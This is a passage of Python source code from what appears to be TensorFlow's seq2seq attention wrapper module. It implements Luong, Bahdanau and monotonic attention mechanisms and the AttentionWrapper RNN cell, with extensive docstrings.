lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. scale: Python boolean. Whether to scale the energy term. probability_fn: (optional) A `callable`. Converts the score to probabilities. The default is @{tf.nn.softmax}. Other options include @{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}. Its signature should be: `probabilities = probability_fn(score)`. score_mask_value: (optional) The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. dtype: The data type for the memory layer of the attention mechanism. name: Name to use when creating ops. """ # For LuongAttention, we only transform the memory layer; thus # num_units **must** match expected the query depth. 
if probability_fn is None: probability_fn = nn_ops.softmax if dtype is None: dtype = dtypes.float32 wrapped_probability_fn = lambda score, _: probability_fn(score) super(LuongAttention, self).__init__( query_layer=None, memory_layer=layers_core.Dense( num_units, name="memory_layer", use_bias=False, dtype=dtype), memory=memory, probability_fn=wrapped_probability_fn, memory_sequence_length=memory_sequence_length, score_mask_value=score_mask_value, name=name) self._num_units = num_units self._scale = scale self._name = name def __call__(self, query, state): """Score the query based on the keys and values. Args: query: Tensor of dtype matching `self.values` and shape `[batch_size, query_depth]`. state: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). Returns: alignments: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). """ with variable_scope.variable_scope(None, "luong_attention", [query]): score = _luong_score(query, self._keys, self._scale) alignments = self._probability_fn(score, state) next_state = alignments return alignments, next_state def _bahdanau_score(processed_query, keys, normalize): """Implements Bahdanau-style (additive) scoring function. This attention has two forms. The first is Bhandanau attention, as described in: Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio. "Neural Machine Translation by Jointly Learning to Align and Translate." ICLR 2015. https://arxiv.org/abs/1409.0473 The second is the normalized form. This form is inspired by the weight normalization article: Tim Salimans, Diederik P. Kingma. "Weight Normalization: A Simple Reparameterization to Accelerate Training of Deep Neural Networks." https://arxiv.org/abs/1602.07868 To enable the second form, set `normalize=True`. Args: processed_query: Tensor, shape `[batch_size, num_units]` to compare to keys. keys: Processed memory, shape `[batch_size, max_time, num_units]`. normalize: Whether to normalize the score function. Returns: A `[batch_size, max_time]` tensor of unnormalized score values. """ dtype = processed_query.dtype # Get the number of hidden units from the trailing dimension of keys num_units = keys.shape[2].value or array_ops.shape(keys)[2] # Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting. processed_query = array_ops.expand_dims(processed_query, 1) v = variable_scope.get_variable( "attention_v", [num_units], dtype=dtype) if normalize: # Scalar used in weight normalization g = variable_scope.get_variable( "attention_g", dtype=dtype, initializer=math.sqrt((1. / num_units))) # Bias added prior to the nonlinearity b = variable_scope.get_variable( "attention_b", [num_units], dtype=dtype, initializer=init_ops.zeros_initializer()) # normed_v = g * v / ||v|| normed_v = g * v * math_ops.rsqrt( math_ops.reduce_sum(math_ops.square(v))) return math_ops.reduce_sum( normed_v * math_ops.tanh(keys + processed_query + b), [2]) else: return math_ops.reduce_sum(v * math_ops.tanh(keys + processed_query), [2]) class BahdanauAttention(_BaseAttentionMechanism): """Implements Bahdanau-style (additive) attention. This attention has two forms. The first is Bahdanau attention, as described in: Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio. "Neural Machine Translation by Jointly Learning to Align and Translate." ICLR 2015. https://arxiv.org/abs/1409.0473 The second is the normalized form. 
This form is inspired by the weight normalization article: Tim Salimans, Diederik P. Kingma. "Weight Normalization: A Simple Reparameterization to Accelerate Training of Deep Neural Networks." https://arxiv.org/abs/1602.07868 To enable the second form, construct the object with parameter `normalize=True`. """ def __init__(self, num_units, memory, memory_sequence_length=None, normalize=False, probability_fn=None, score_mask_value=None, dtype=None, name="BahdanauAttention"): """Construct the Attention mechanism. Args: num_units: The depth of the query mechanism. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. memory_sequence_length (optional): Sequence lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. normalize: Python boolean. Whether to normalize the energy term. probability_fn: (optional) A `callable`. Converts the score to probabilities. The default is @{tf.nn.softmax}. Other options include @{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}. Its signature should be: `probabilities = probability_fn(score)`. score_mask_value: (optional): The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. dtype: The data type for the query and memory layers of the attention mechanism. name: Name to use when creating ops. """ if probability_fn is None: probability_fn = nn_ops.softmax if dtype is None: dtype = dtypes.float32 wrapped_probability_fn = lambda score, _: probability_fn(score) super(BahdanauAttention, self).__init__( query_layer=layers_core.Dense( num_units, name="query_layer", use_bias=False, dtype=dtype), memory_layer=layers_core.Dense( num_units, name="memory_layer", use_bias=False, dtype=dtype), memory=memory, probability_fn=wrapped_probability_fn, memory_sequence_length=memory_sequence_length, score_mask_value=score_mask_value, name=name) self._num_units = num_units self._normalize = normalize self._name = name def __call__(self, query, state): """Score the query based on the keys and values. Args: query: Tensor of dtype matching `self.values` and shape `[batch_size, query_depth]`. state: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). Returns: alignments: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). """ with variable_scope.variable_scope(None, "bahdanau_attention", [query]): processed_query = self.query_layer(query) if self.query_layer else query score = _bahdanau_score(processed_query, self._keys, self._normalize) alignments = self._probability_fn(score, state) next_state = alignments return alignments, next_state def safe_cumprod(x, *args, **kwargs): """Computes cumprod of x in logspace using cumsum to avoid underflow. The cumprod function and its gradient can result in numerical instabilities when its argument has very small and/or zero values. As long as the argument is all positive, we can instead compute the cumulative product as exp(cumsum(log(x))). This function can be called identically to tf.cumprod. Args: x: Tensor to take the cumulative product of. *args: Passed on to cumsum; these are identical to those in cumprod. **kwargs: Passed on to cumsum; these are identical to those in cumprod. Returns: Cumulative product of x. 
""" with ops.name_scope(None, "SafeCumprod", [x]): x = ops.convert_to_tensor(x, name="x") tiny = np.finfo(x.dtype.as_numpy_dtype).tiny return math_ops.exp(math_ops.cumsum( math_ops.log(clip_ops.clip_by_value(x, tiny, 1)), *args, **kwargs)) def monotonic_attention(p_choose_i, previous_attention, mode): """Compute monotonic attention distribution from choosing probabilities. Monotonic attention implies that the input sequence is processed in an explicitly left-to-right manner when generating the output sequence. In addition, once an input sequence element is attended to at a given output timestep, elements occurring before it cannot be attended to at subsequent output timesteps. This function generates attention distributions according to these assumptions. For more information, see ``Online and Linear-Time Attention by Enforcing Monotonic Alignments''. Args: p_choose_i: Probability of choosing input sequence/memory element i. Should be of shape (batch_size, input_sequence_length), and should all be in the range [0, 1]. previous_attention: The attention distribution from the previous output timestep. Should be of shape (batch_size, input_sequence_length). For the first output timestep, preevious_attention[n] should be [1, 0, 0, ..., 0] for all n in [0, ... batch_size - 1]. mode: How to compute the attention distribution. Must be one of 'recursive', 'parallel', or 'hard'. * 'recursive' uses tf.scan to recursively compute the distribution. This is slowest but is exact, general, and does not suffer from numerical instabilities. * 'parallel' uses parallelized cumulative-sum and cumulative-product operations to compute a closed-form solution to the recurrence relation defining the attention distribution. This makes it more efficient than 'recursive', but it requires numerical checks which make the distribution non-exact. This can be a problem in particular when input_sequence_length is long and/or p_choose_i has entries very close to 0 or 1. * 'hard' requires that the probabilities in p_choose_i are all either 0 or 1, and subsequently uses a more efficient and exact solution. Returns: A tensor of shape (batch_size, input_sequence_length) representing the attention distributions for each sequence in the batch. Raises: ValueError: mode is not one of 'recursive', 'parallel', 'hard'. 
""" # Force things to be tensors p_choose_i = ops.convert_to_tensor(p_choose_i, name="p_choose_i") previous_attention = ops.convert_to_tensor( previous_attention, name="previous_attention") if mode == "recursive": # Use .shape[0].value when it's not None, or fall back on symbolic shape batch_size = p_choose_i.shape[0].value or array_ops.shape(p_choose_i)[0] # Compute [1, 1 - p_choose_i[0], 1 - p_choose_i[1], ..., 1 - p_choose_i[-2]] shifted_1mp_choose_i = array_ops.concat( [array_ops.ones((batch_size, 1)), 1 - p_choose_i[:, :-1]], 1) # Compute attention distribution recursively as # q[i] = (1 - p_choose_i[i])*q[i - 1] + previous_attention[i] # attention[i] = p_choose_i[i]*q[i] attention = p_choose_i*array_ops.transpose(functional_ops.scan( # Need to use reshape to remind TF of the shape between loop iterations lambda x, yz: array_ops.reshape(yz[0]*x + yz[1], (batch_size,)), # Loop variables yz[0] and yz[1] [array_ops.transpose(shifted_1mp_choose_i), array_ops.transpose(previous_attention)], # Initial value of x is just zeros array_ops.zeros((batch_size,)))) elif mode == "parallel": # safe_cumprod computes cumprod in logspace with numeric checks cumprod_1mp_choose_i = safe_cumprod(1 - p_choose_i, axis=1, exclusive=True) # Compute recurrence relation solution attention = p_choose_i*cumprod_1mp_choose_i*math_ops.cumsum( previous_attention / # Clip cumprod_1mp to avoid divide-by-zero clip_ops.clip_by_value(cumprod_1mp_choose_i, 1e-10, 1.), axis=1) elif mode == "hard": # Remove any probabilities before the index chosen last time step p_choose_i *= math_ops.cumsum(previous_attention, axis=1) # Now, use exclusive cumprod to remove probabilities after the first # chosen index, like so: # p_choose_i = [0, 0, 0, 1, 1, 0, 1, 1] # cumprod(1 - p_choose_i, exclusive=True) = [1, 1, 1, 1, 0, 0, 0, 0] # Product of above: [0, 0, 0, 1, 0, 0, 0, 0] attention = p_choose_i*math_ops.cumprod( 1 - p_choose_i, axis=1, exclusive=True) else: raise ValueError("mode must be 'recursive', 'parallel', or 'hard'.") return attention def _monotonic_probability_fn(score, previous_alignments, sigmoid_noise, mode, seed=None): """Attention probability function for monotonic attention. Takes in unnormalized attention scores, adds pre-sigmoid noise to encourage the model to make discrete attention decisions, passes them through a sigmoid to obtain "choosing" probabilities, and then calls monotonic_attention to obtain the attention distribution. For more information, see Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck, "Online and Linear-Time Attention by Enforcing Monotonic Alignments." ICML 2017. https://arxiv.org/abs/1704.00784 Args: score: Unnormalized attention scores, shape `[batch_size, alignments_size]` previous_alignments: Previous attention distribution, shape `[batch_size, alignments_size]` sigmoid_noise: Standard deviation of pre-sigmoid noise. Setting this larger than 0 will encourage the model to produce large attention scores, effectively making the choosing probabilities discrete and the resulting attention distribution one-hot. It should be set to 0 at test-time, and when hard attention is not desired. mode: How to compute the attention distribution. Must be one of 'recursive', 'parallel', or 'hard'. See the docstring for `tf.contrib.seq2seq.monotonic_attention` for more information. seed: (optional) Random seed for pre-sigmoid noise. Returns: A `[batch_size, alignments_size]`-shape tensor corresponding to the resulting attention distribution. 
""" # Optionally add pre-sigmoid noise to the scores if sigmoid_noise > 0: noise = random_ops.random_normal(array_ops.shape(score), dtype=score.dtype, seed=seed) score += sigmoid_noise*noise # Compute "choosing" probabilities from the attention scores if mode == "hard": # When mode is hard, use a hard sigmoid p_choose_i = math_ops.cast(score > 0, score.dtype) else: p_choose_i = math_ops.sigmoid(score) # Convert from choosing probabilities to attention distribution return monotonic_attention(p_choose_i, previous_alignments, mode) class _BaseMonotonicAttentionMechanism(_BaseAttentionMechanism): """Base attention mechanism for monotonic attention. Simply overrides the initial_alignments function to provide a dirac distribution,which is needed in order for the monotonic attention distributions to have the correct behavior. """ def initial_alignments(self, batch_size, dtype): """Creates the initial alignment values for the monotonic attentions. Initializes to dirac distributions, i.e. [1, 0, 0, ...memory length..., 0] for all entries in the batch. Args: batch_size: `int32` scalar, the batch_size. dtype: The `dtype`. Returns: A `dtype` tensor shaped `[batch_size, alignments_size]` (`alignments_size` is the values' `max_time`). """ max_time = self._alignments_size return array_ops.one_hot( array_ops.zeros((batch_size,), dtype=dtypes.int32), max_time, dtype=dtype) class BahdanauMonotonicAttention(_BaseMonotonicAttentionMechanism): """Monotonic attention mechanism with Bahadanau-style energy function. This type of attention encorces a monotonic constraint on the attention distributions; that is once the model attends to a given point in the memory it can't attend to any prior points at subsequence output timesteps. It achieves this by using the _monotonic_probability_fn instead of softmax to construct its attention distributions. Since the attention scores are passed through a sigmoid, a learnable scalar bias parameter is applied after the score function and before the sigmoid. Otherwise, it is equivalent to BahdanauAttention. This approach is proposed in Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck, "Online and Linear-Time Attention by Enforcing Monotonic Alignments." ICML 2017. https://arxiv.org/abs/1704.00784 """ def __init__(self, num_units, memory, memory_sequence_length=None, normalize=False, score_mask_value=None, sigmoid_noise=0., sigmoid_noise_seed=None, score_bias_init=0., mode="parallel", dtype=None, name="BahdanauMonotonicAttention"): """Construct the Attention mechanism. Args: num_units: The depth of the query mechanism. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. memory_sequence_length (optional): Sequence lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. normalize: Python boolean. Whether to normalize the energy term. score_mask_value: (optional): The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring for `_monotonic_probability_fn` for more information. sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise. score_bias_init: Initial value for score bias scalar. It's recommended to initialize this to a negative value when the length of the memory is large. mode: How to compute the attention distribution. 
Must be one of 'recursive', 'parallel', or 'hard'. See the docstring for `tf.contrib.seq2seq.monotonic_attention` for more information. dtype: The data type for the query and memory layers of the attention mechanism. name: Name to use when creating ops. """ # Set up the monotonic probability fn with supplied parameters if dtype is None: dtype = dtypes.float32 wrapped_probability_fn = functools.partial( _monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode, seed=sigmoid_noise_seed) super(BahdanauMonotonicAttention, self).__init__( query_layer=layers_core.Dense( num_units, name="query_layer", use_bias=False, dtype=dtype), memory_layer=layers_core.Dense( num_units, name="memory_layer", use_bias=False, dtype=dtype), memory=memory, probability_fn=wrapped_probability_fn, memory_sequence_length=memory_sequence_length, score_mask_value=score_mask_value, name=name) self._num_units = num_units self._normalize = normalize self._name = name self._score_bias_init = score_bias_init def __call__(self, query, state): """Score the query based on the keys and values. Args: query: Tensor of dtype matching `self.values` and shape `[batch_size, query_depth]`. state: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). Returns: alignments: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). """ with variable_scope.variable_scope( None, "bahdanau_monotonic_attention", [query]): processed_query = self.query_layer(query) if self.query_layer else query score = _bahdanau_score(processed_query, self._keys, self._normalize) score_bias = variable_scope.get_variable( "attention_score_bias", dtype=processed_query.dtype, initializer=self._score_bias_init) score += score_bias alignments = self._probability_fn(score, state) next_state = alignments return alignments, next_state class LuongMonotonicAttention(_BaseMonotonicAttentionMechanism): """Monotonic attention mechanism with Luong-style energy function. This type of attention encorces a monotonic constraint on the attention distributions; that is once the model attends to a given point in the memory it can't attend to any prior points at subsequence output timesteps. It achieves this by using the _monotonic_probability_fn instead of softmax to construct its attention distributions. Otherwise, it is equivalent to LuongAttention. This approach is proposed in Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck, "Online and Linear-Time Attention by Enforcing Monotonic Alignments." ICML 2017. https://arxiv.org/abs/1704.00784 """ def __init__(self, num_units, memory, memory_sequence_length=None, scale=False, score_mask_value=None, sigmoid_noise=0., sigmoid_noise_seed=None, score_bias_init=0., mode="parallel", dtype=None, name="LuongMonotonicAttention"): """Construct the Attention mechanism. Args: num_units: The depth of the query mechanism. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. memory_sequence_length (optional): Sequence lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. scale: Python boolean. Whether to scale the energy term. score_mask_value: (optional): The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. 
sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring for `_monotonic_probability_fn` for more information. sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise. score_bias_init: Initial value for score bias scalar. It's recommended to initialize this to a negative value when the length of the memory is large. mode: How to compute the attention distribution. Must be one of 'recursive', 'parallel', or 'hard'. See the docstring for `tf.contrib.seq2seq.monotonic_attention` for more information. dtype: The data type for the query and memory layers of the attention mechanism. name: Name to use when creating ops. """ # Set up the monotonic probability fn with supplied parameters if dtype is None: dtype = dtypes.float32 wrapped_probability_fn = functools.partial( _monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode, seed=sigmoid_noise_seed) super(LuongMonotonicAttention, self).__init__( query_layer=None, memory_layer=layers_core.Dense( num_units, name="memory_layer", use_bias=False, dtype=dtype), memory=memory, probability_fn=wrapped_probability_fn, memory_sequence_length=memory_sequence_length, score_mask_value=score_mask_value, name=name) self._num_units = num_units self._scale = scale self._score_bias_init = score_bias_init self._name = name def __call__(self, query, state): """Score the query based on the keys and values. Args: query: Tensor of dtype matching `self.values` and shape `[batch_size, query_depth]`. state: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). Returns: alignments: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). """ with variable_scope.variable_scope(None, "luong_monotonic_attention", [query]): score = _luong_score(query, self._keys, self._scale) score_bias = variable_scope.get_variable( "attention_score_bias", dtype=query.dtype, initializer=self._score_bias_init) score += score_bias alignments = self._probability_fn(score, state) next_state = alignments return alignments, next_state class AttentionWrapperState( collections.namedtuple("AttentionWrapperState", ("cell_state", "attention", "time", "alignments", "alignment_history", "attention_state"))): """`namedtuple` storing the state of a `AttentionWrapper`. Contains: - `cell_state`: The state of the wrapped `RNNCell` at the previous time step. - `attention`: The attention emitted at the previous time step. - `time`: int32 scalar containing the current time step. - `alignments`: A single or tuple of `Tensor`(s) containing the alignments emitted at the previous time step for each attention mechanism. - `alignment_history`: (if enabled) a single or tuple of `TensorArray`(s) containing alignment matrices from all time steps for each attention mechanism. Call `stack()` on each to convert to a `Tensor`. - `attention_state`: A single or tuple of nested objects containing attention mechanism state for each attention mechanism. The objects may contain Tensors or TensorArrays. """ def clone(self, **kwargs): """Clone this object, overriding components provided by kwargs. The new state fields' shape must match original state fields' shape. This will be validated, and original fields' shape will be propagated to new fields. Example: ```python initial_state = attention_wrapper.zero_state(dtype=..., batch_size=...) 
initial_state = initial_state.clone(cell_state=encoder_state) ``` Args: **kwargs: Any properties of the state object to replace in the returned `AttentionWrapperState`. Returns: A new `AttentionWrapperState` whose properties are the same as this one, except any overridden properties as provided in `kwargs`. """ def with_same_shape(old, new): """Check and set new tensor's shape.""" if isinstance(old, ops.Tensor) and isinstance(new, ops.Tensor): return tensor_util.with_same_shape(old, new) return new return nest.map_structure( with_same_shape, self, super(AttentionWrapperState, self)._replace(**kwargs)) def hardmax(logits, name=None): """Returns batched one-hot vectors. The depth index containing the `1` is that of the maximum logit value. Args: logits: A batch tensor of logit values. name: Name to use when creating ops. Returns: A batched one-hot tensor. """ with ops.name_scope(name, "Hardmax", [logits]): logits = ops.convert_to_tensor(logits, name="logits") if logits.get_shape()[-1].value is not None: depth = logits.get_shape()[-1].value else: depth = array_ops.shape(logits)[-1] return array_ops.one_hot( math_ops.argmax(logits, -1), depth, dtype=logits.dtype) def _compute_attention(attention_mechanism, cell_output, attention_state, attention_layer): """Computes the attention and alignments for a given attention_mechanism.""" alignments, next_attention_state = attention_mechanism( cell_output, state=attention_state) # Reshape from [batch_size, memory_time] to [batch_size, 1, memory_time] expanded_alignments = array_ops.expand_dims(alignments, 1) # Context is the inner product of alignments and values along the # memory time dimension. # alignments shape is # [batch_size, 1, memory_time] # attention_mechanism.values shape is # [batch_size, memory_time, memory_size] # the batched matmul is over memory_time, so the output shape is # [batch_size, 1, memory_size]. # we then squeeze out the singleton dim. context = math_ops.matmul(expanded_alignments, attention_mechanism.values) context = array_ops.squeeze(context, [1]) if attention_layer is not None: attention = attention_layer(array_ops.concat([cell_output, context], 1)) else: attention = context return attention, alignments, next_attention_state class AttentionWrapper(rnn_cell_impl.RNNCell): """Wraps another `RNNCell` with attention. """ def __init__(self, cell, attention_mechanism, attention_layer_size=None, alignment_history=False, cell_input_fn=None, output_attention=True, initial_cell_state=None, name=None): """Construct the `AttentionWrapper`. **NOTE** If you are using the `BeamSearchDecoder` with a cell wrapped in `AttentionWrapper`, then you must ensure that: - The encoder output has been tiled to `beam_width` via @{tf.contrib.seq2seq.tile_batch} (NOT `tf.tile`). - The `batch_size` argument passed to the `zero_state` method of this wrapper is equal to `true_batch_size * beam_width`. - The initial state created with `zero_state` above contains a `cell_state` value containing properly tiled final state from the encoder. An example: ``` tiled_encoder_outputs = tf.contrib.seq2seq.tile_batch( encoder_outputs, multiplier=beam_width) tiled_encoder_final_state = tf.conrib.seq2seq.tile_batch( encoder_final_state, multiplier=beam_width) tiled_sequence_length = tf.contrib.seq2seq.tile_batch( sequence_length, multiplier=beam_width) attention_mechanism = MyFavoriteAttentionMechanism( num_units=attention_depth, memory=tiled_inputs, memory_sequence_length=tiled_sequence_length) attention_cell = AttentionWrapper(cell, attention_mechanism, ...) 
decoder_initial_state = attention_cell.zero_state( dtype, batch_size=true_batch_size * beam_width) decoder_initial_state = decoder_initial_state.clone( cell_state=tiled_encoder_final_state) ``` Args: cell: An instance of `RNNCell`. attention_mechanism: A list of `AttentionMechanism` instances or a single instance. attention_layer_size: A list of Python integers or a single Python integer, the depth of the attention (output) layer(s). If None (default), use the context as attention at each time step. Otherwise, feed the context and cell output into the attention layer to generate attention at each time step. If attention_mechanism is a list, attention_layer_size must be a list of the same length. alignment_history: Python boolean, whether to store alignment history from all time steps in the final output state (currently stored as a time major `TensorArray` on which you must call `stack()`). cell_input_fn: (optional) A `callable`. The default is: `lambda inputs, attention: array_ops.concat([inputs, attention], -1)`. output_attention: Python bool. If `True` (default), the output at each time step is the attention value. This is the behavior of Luong-style attention mechanisms. If `False`, the output at each time step is the output of `cell`. This is the beahvior of Bhadanau-style attention mechanisms. In both cases, the `attention` tensor is propagated to the next time step via the state and is used there. This flag only controls whether the attention mechanism is propagated up to the next cell in an RNN stack or to the top RNN output. initial_cell_state: The initial state value to use for the cell when the user calls `zero_state()`. Note that if this value is provided now, and the user uses a `batch_size` argument of `zero_state` which does not match the batch size of `initial_cell_state`, proper behavior is not guaranteed. name: Name to use when creating ops. Raises: TypeError: `attention_layer_size` is not None and (`attention_mechanism` is a list but `attention_layer_size` is not; or vice versa). ValueError: if `attention_layer_size` is not None, `attention_mechanism` is a list, and its length does not match that of `attention_layer_size`. 
""" super(AttentionWrapper, self).__init__(name=name) rnn_cell_impl.assert_like_rnncell("cell", cell) if isinstance(attention_mechanism, (list, tuple)): self._is_multi = True attention_mechanisms = attention_mechanism for attention_mechanism in attention_mechanisms: if not isinstance(attention_mechanism, AttentionMechanism): raise TypeError( "attention_mechanism must contain only instances of " "AttentionMechanism, saw type: %s" % type(attention_mechanism).__name__) else: self._is_multi = False if not isinstance(attention_mechanism, AttentionMechanism): raise TypeError( "attention_mechanism must be an AttentionMechanism or list of " "multiple AttentionMechanism instances, saw type: %s" % type(attention_mechanism).__name__) attention_mechanisms = (attention_mechanism,) if cell_input_fn is None: cell_input_fn = ( lambda inputs, attention: array_ops.concat([inputs, attention], -1)) else: if not callable(cell_input_fn): raise TypeError( "cell_input_fn must be callable, saw type: %s" % type(cell_input_fn).__name__) if attention_layer_size is not None: attention_layer_sizes = tuple( attention_layer_size if isinstance(attention_layer_size, (list, tuple)) else (attention_layer_size,)) if len(attention_layer_sizes) != len(attention_mechanisms): raise ValueError( "If provided, attention_layer_size must contain exactly one " "integer per attention_mechanism, saw: %d vs %d" % (len(attention_layer_sizes), len(attention_mechanisms))) self._attention_layers = tuple( layers_core.Dense( attention_layer_size, name="attention_layer", use_bias=False, dtype=attention_mechanisms[i].dtype) for i, attention_layer_size in enumerate(attention_layer_sizes)) self._attention_layer_size = sum(attention_layer_sizes) else: self._attention_layers = None self._attention_layer_size = sum( attention_mechanism.values.get_shape()[-1].value for attention_mechanism in attention_mechanisms) self._cell = cell self._attention_mechanisms = attention_mechanisms self._cell_input_fn = cell_input_fn self._output_attention = output_attention self._alignment_history = alignment_history with ops.name_scope(name, "AttentionWrapperInit"): if initial_cell_state is None: self._initial_cell_state = None else: final_state_tensor = nest.flatten(initial_cell_state)[-1] state_batch_size = ( final_state_tensor.shape[0].value or array_ops.shape(final_state_tensor)[0]) error_message = ( "When constructing AttentionWrapper %s: " % self._base_name + "Non-matching batch sizes between the memory " "(encoder output) and initial_cell_state. Are you using " "the BeamSearchDecoder? You may need to tile your initial state " "via the tf.contrib.seq2seq.tile_batch function with argument " "multiple=beam_width.") with ops.control_dependencies( self._batch_size_checks(state_batch_size, error_message)): self._initial_cell_state = nest.map_structure( lambda s: array_ops.identity(s, name="check_initial_cell_state"), initial_cell_state) def _batch_size_checks(self, batch_size, error_message): return [check_ops.assert_equal(batch_size, attention_mechanism.batch_size, message=error_message) for attention_mechanism in self._attention_mechanisms] def _item_or_tuple(self, seq): """Returns `seq` as tuple or the singular element. Which is returned is determined by how the AttentionMechanism(s) were passed to the constructor. Args: seq: A non-empty sequence of items or generator. Returns: Either the values in the sequence as a tuple if AttentionMechanism(s) were passed to the constructor as a sequence or the singular element. 
""" t = tuple(seq) if self._is_multi: return t else: return t[0] @property def output_size(self): if self._output_attention: return self._attention_layer_size else: return self._cell.output_size @property def state_size(self): """The `state_size` property of `AttentionWrapper`. Returns: An `AttentionWrapperState` tuple containing shapes used by this object. """ return AttentionWrapperState( cell_state=self._cell.state_size, time=tensor_shape.TensorShape([]), attention=self._attention_layer_size, alignments=self._item_or_tuple( a.alignments_size for a in self._attention_mechanisms), attention_state=self._item_or_tuple( a.state_size for a in self._attention_mechanisms), alignment_history=self._item_or_tuple( a.alignments_size if self._alignment_history else () for a in self._attention_mechanisms)) # sometimes a TensorArray def zero_state(self, batch_size, dtype): """Return an initial (zero) state tuple for this `AttentionWrapper`. **NOTE** Please see the initializer documentation for details of how to call `zero_state` if using an `AttentionWrapper` with a `BeamSearchDecoder`. Args: batch_size: `0D` integer tensor: the batch size. dtype: The internal state data type. Returns: An `AttentionWrapperState` tuple containing zeroed out tensors and, possibly, empty `TensorArray` objects. Raises: ValueError: (or, possibly at runtime, InvalidArgument), if `batch_size` does not match the output size of the encoder passed to the wrapper object at initialization time. """ with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]): if self._initial_cell_state is not None: cell_state = self._initial_cell_state else: cell_state = self._cell.zero_state(batch_size, dtype) error_message = ( "When calling zero_state of AttentionWrapper %s: " % self._base_name + "Non-matching batch sizes between the memory " "(encoder output) and the requested batch size. Are you using " "the BeamSearchDecoder? If so, make sure your encoder output has " "been tiled to beam_width via tf.contrib.seq2seq.tile_batch, and " "the batch_size= argument passed to zero_state is " "batch_size * beam_width.") with ops.control_dependencies( self._batch_size_checks(batch_size, error_message)): cell_state = nest.map_structure( lambda s: array_ops.identity(s, name="checked_cell_state"), cell_state) initial_alignments = [ attention_mechanism.initial_alignments(batch_size, dtype) for attention_mechanism in self._attention_mechanisms] return AttentionWrapperState( cell_state=cell_state, time=array_ops.zeros([], dtype=dtypes.int32), attention=_zero_state_tensors(self._attention_layer_size, batch_size, dtype), alignments=self._item_or_tuple(initial_alignments), attention_state=self._item_or_tuple( attention_mechanism.initial_state(batch_size, dtype) for attention_mechanism in self._attention_mechanisms), alignment_history=self._item_or_tuple( tensor_array_ops.TensorArray( dtype, size=0, dynamic_size=True, element_shape=alignment.shape) if self._alignment_history else () for alignment in initial_alignments)) def call(self, inputs, state): """Perform a step of attention-wrapped RNN. - Step 1: Mix the `inputs` and previous step's `attention` output via `cell_input_fn`. - Step 2: Call the wrapped `cell` with this input and its previous state. - Step 3: Score the cell's output with `attention_mechanism`. - Step 4: Calculate the alignments by passing the score through the `normalizer`. - Step 5: Calculate the context vector as the inner product between the alignments and the attention_mechanism's values (memory). 
- Step 6: Calculate the attention output by concatenating the cell output and context through the attention layer (a linear layer with `attention_layer_size` outputs). Args: inputs: (Possibly nested tuple of) Tensor, the input at this time step. state: An instance of `AttentionWrapperState` containing tensors from the previous time step. Returns: A tuple `(attention_or_cell_output, next_state)`, where: - `attention_or_cell_output` depending on `output_attention`. - `next_state` is an instance of `AttentionWrapperState` containing the state calculated at this time step. Raises: TypeError: If `state` is not an instance of `AttentionWrapperState`. """ if not isinstance(state, AttentionWrapperState): raise TypeError("Expected state to be instance of AttentionWrapperState. " "Received type %s instead." % type(state)) # Step 1: Calculate the true inputs to the cell based on the # previous attention value. cell_inputs = self._cell_input_fn(inputs, state.attention) cell_state = state.cell_state cell_output, next_cell_state = self._cell(cell_inputs, cell_state) cell_batch_size = ( cell_output.shape[0].value or array_ops.shape(cell_output)[0]) error_message = ( "When applying AttentionWrapper %s: " % self.name + "Non-matching batch sizes between the memory " "(encoder output) and the query (decoder output). Are you using " "the BeamSearchDecoder? You may need to tile your memory input via " "the tf.contrib.seq2seq.tile_batch function with argument " "multiple=beam_width.") with ops.control_dependencies( self._batch_size_checks(cell_batch_size, error_message)): cell_output = array_ops.identity( cell_output, name="checked_cell_output") if self._is_multi: previous_attention_state = state.attention_state previous_alignment_history = state.alignment_history else: previous_attention_state = [state.attention_state] previous_alignment_history = [state.alignment_history] all_alignments = [] all_attentions = [] all_attention_states = [] maybe_all_histories = [] for i, attention_mechanism in enumerate(self._attention_mechanisms): attention, alignments, next_attention_state = _compute_attention( attention_mechanism, cell_output, previous_attention_state[i], self._attention_layers[i] if self._attention_layers else 